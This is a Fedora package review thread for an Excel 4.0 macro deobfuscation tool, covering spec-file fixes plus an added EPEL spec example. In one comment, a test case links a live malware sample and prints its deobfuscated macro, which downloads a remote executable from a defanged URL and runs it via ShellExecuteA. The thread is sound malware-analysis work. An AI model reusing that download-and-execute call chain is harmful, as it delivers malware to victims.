Bug 2245786 - Review Request: python-xlmmacrodeobfuscator - XLM Emulation engine to deobfuscate malicious XLM macros, also known as Excel 4
Keywords:
Status: NEW
Alias: None
Product: Fedora
Classification: Fedora
Component: Package Review
Version: rawhide
Hardware: Unspecified
OS: Unspecified
Target Milestone: ---
Assignee: Nobody's working on this, feel free to take it
QA Contact: Fedora Extras Quality Assurance
URL: https://github.com/DissectMalware/XLM...
Whiteboard: NotReady
Depends On: 2246454 2246704 2250689
Blocks: 1974565
 
Reported: 2023-10-24 07:31 UTC by Michal Ambroz
Modified: 2023-11-20 15:23 UTC (History)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed:
Type: ---
Embargoed:



Description Michal Ambroz 2023-10-24 07:31:54 UTC
Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec
SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src.rpm

Description:
XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known
as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the
macros, without fully performing the code. It supports xls, xlsm, and xlsb
formats. It uses xlrd2, pyxlsb2 and its own parser to extract cells and other
information from xls, xlsb and xlsm files, respectively.

Fedora Account System Username: rebus

Comment 1 Michal Ambroz 2023-10-24 07:31:57 UTC
This package built on koji:  https://koji.fedoraproject.org/koji/taskinfo?taskID=108021352

Comment 2 Aaron Rainbolt 2023-10-24 23:59:04 UTC
Unofficial and incomplete initial review of the spec file:

> License:        Apache License 2.0

This needs to use an SPDX identifier. See https://docs.fedoraproject.org/en-US/legal/license-field/

Also more often than not, a program isn't really under just one license, but oftentimes includes code from other projects under various other licenses. Any files that ultimately end up in the binary RPM in one form or another need to have their licenses listed here.

> %{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}

Can you replace this with %py_provides somehow? %python_provide was deprecated even in the 201x-era Python packaging guidelines (https://docs.fedoraproject.org/en-US/packaging-guidelines/Python_201x/), and those guidelines are now old and deprecated at this point, so %python_provide is like **really** deprecated now. See https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_provides_and_requirements for how to use %py_provides.

> BuildRequires:  python%{python3_pkgversion}-devel

I think you need to spell out "python3-devel" here rather than using the macro. "Every package that uses Python (at runtime and/or build time) and/or installs Python modules MUST explicitly include BuildRequires: python3-devel in its .spec file, even if Python is not actually invoked during build time." (From https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_distro_wide_guidelines)

Comment 3 Fedora Review Service 2023-10-25 02:33:50 UTC
Copr build:
https://copr.fedorainfracloud.org/coprs/build/6563210
(succeeded)

Review template:
https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-review-2245786-python-xlmmacrodeobfuscator/fedora-rawhide-x86_64/06563210-python-xlmmacrodeobfuscator/fedora-review/review.txt

Please take a look if any issues were found.

---
This comment was created by the fedora-review-service
https://github.com/FrostyX/fedora-review-service

If you want to trigger a new Copr build, add a comment containing new
Spec and SRPM URLs or [fedora-review-service-build] string.

Comment 4 Michal Ambroz 2023-10-26 15:59:02 UTC
> > License:        Apache License 2.0
changed from long to short SPDX identifier

> > %{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}
> > BuildRequires:  python%{python3_pkgversion}-devel
> I think you need to spell out "python3-devel" here rather than using the
I am planning to support EPEL from RHEL 7; on RHEL this macro translates the package name to python36-something
instead of just python3-something.
I noticed a bigger problem ... I was actually missing the camel-casing, which was the reason for explicitly adding that.

 
> Can you replace this with %py_provides somehow? %python_provide was
> deprecated even in the 201x-era Python packaging guidelines
Again something for the EPEL package ... there is only python_provide on EPEL.
Let's make a condition for that to be clear.


Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec
SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src.rpm
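An added example of the conditional proposed in the comment above, so that the %py_provides and python3-devel points from the review and the EPEL fallback can live in one spec. This fragment is not the spec under review and not the project's own code; it assumes %py_provides is available on Fedora and on EPEL 9 or newer, that older EPEL only ships the deprecated %python_provide, and that %{python3_pkgversion} expands to 36 on EPEL 7:

```spec
# Added example, not the spec under review: a preamble fragment showing one way
# to reconcile the reviewer's %%py_provides / python3-devel points with the
# EPEL builds the reporter wants to keep.  Assumptions (not stated in the
# thread): %%py_provides exists on Fedora and on EPEL 9 or newer, older EPEL
# only ships %%python_provide, and on EPEL 7 %%{python3_pkgversion} expands to
# 36 (python36-devel, python36-xlmmacrodeobfuscator).
# Note the doubled %% in comments: rpm expands macros even inside comments.
%global pypi_name xlmmacrodeobfuscator

Name:           python-%{pypi_name}
Version:        0.2.7
Release:        1%{?dist}
Summary:        XLM Emulation engine to deobfuscate malicious XLM macros
# Short SPDX identifier, as requested in the review
License:        Apache-2.0

# The guidelines require the literal "python3-devel"; the macro spelling is
# kept only for EPEL 7, where it has to become python36-devel
%if 0%{?rhel} && 0%{?rhel} < 8
BuildRequires:  python%{python3_pkgversion}-devel
%else
BuildRequires:  python3-devel
%endif

%description
XLM emulation engine that decodes obfuscated XLM (Excel 4.0) macros without
fully executing them.

# Subpackage keeps the %%{python3_pkgversion} naming so that RHEL 7 yields
# python36-xlmmacrodeobfuscator while Fedora yields python3-xlmmacrodeobfuscator
%package -n python%{python3_pkgversion}-%{pypi_name}
Summary:        %{summary}
%if 0%{?fedora} || 0%{?rhel} >= 9
# Current guidelines: %%py_provides emits the Provides the guidelines expect
%py_provides python3-%{pypi_name}
%else
# Old EPEL: only the deprecated %%python_provide exists; the ?-test keeps the
# line harmless on a target where even that macro is absent
%{?python_provide:%python_provide python%{python3_pkgversion}-%{pypi_name}}
%endif

%description -n python%{python3_pkgversion}-%{pypi_name}
XLM emulation engine that decodes obfuscated XLM (Excel 4.0) macros without
fully executing them.
```

Which branch a given target takes can be checked before a Koji build by expanding the spec with rpmspec -P and passing --define / --undefine for the fedora and rhel macros of that target.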

Comment 5 Fedora Review Service 2023-10-26 16:06:15 UTC
Copr build:
https://copr.fedorainfracloud.org/coprs/build/6567936
(succeeded)

Review template:
https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-review-2245786-python-xlmmacrodeobfuscator/fedora-rawhide-x86_64/06567936-python-xlmmacrodeobfuscator/fedora-review/review.txt

Please take a look if any issues were found.


Comment 6 Michal Ambroz 2023-11-01 10:47:51 UTC
As this is a really specific tool, I proposed a test case here to verify that the tool does what it is supposed to do.
(BEWARE!!!) It uses real malware for the test, so handle with care. Download of the second stage is not active now, but I am still de-fanging the malicious URL in the example below.

Test 1 is based on Didier Stevens' diary https://isc.sans.edu/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110

1) download the malware sample from MalShare (registration needed)
https://malshare.com/sample.php?action=detail&hash=0be6ece31de89f3efb4125e086416ffc
https://malshare.com/sampleshare.php?action=getfile&hash=01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606

2) (OPTIONAL) check that it really contains the obfuscated code in the worksheet cells (using the DidierStevensSuite)
This step is optional, as this particular sample IS obfuscated and was already publicly analyzed.
$ zipdump.py -s 5 -d 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | xmldump.py celltext | grep -e CALL
BC1986,"CALL($EB$661,$AE$429,$FK$1459,0,$BB$54,$CB$1256,0,0)",0
BC1987,"CALL($BO$1913,$GM$1203,$CF$742,0,$IO$1228,$GC$1642,,0,0)",0

3) check that the xlmdeobfuscator really gives the deobfuscated value
$ xlmdeobfuscator -f 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | grep -e CALL
CELL:BC1986    , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric[.]com/fattura.exe","C:\ProgramData\jeTneVi.exe",0,0)
CELL:BC1987    , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0)

